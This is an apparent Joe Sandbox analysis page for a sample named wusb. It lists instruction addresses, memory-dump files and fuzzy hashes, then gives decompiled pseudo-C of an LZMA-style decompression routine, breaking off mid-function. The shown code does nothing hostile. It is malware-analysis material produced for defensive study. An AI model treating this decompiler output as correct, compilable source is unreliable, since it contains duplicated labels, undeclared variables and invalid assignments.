                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692c
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd4
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x0040700a
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407013
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x00000000
                                                        0x004071c6
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407032
                                                        0x00407032
                                                        0x00407035
                                                        0x00407038
                                                        0x00407038
                                                        0x00000000
                                                        0x00000000
                                                        0x00406956
                                                        0x00406958
                                                        0x0040695b
                                                        0x004069cc
                                                        0x004069cf
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00000000
                                                        0x004069e3
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406964
                                                        0x00406966
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x0040697e
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a3
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00000000
                                                        0x004069c6
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00000000
                                                        0x00406d2e
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00000000
                                                        0x00407080
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x0040703e
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e2
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x00407114
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406f85
                                                        0x004071ba
                                                        0x004071dc
                                                        0x004071e2
                                                        0x004071e4
                                                        0x004071eb
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                        • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                                        • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                        • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00406BF5() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004071F9))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4)); // executed
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
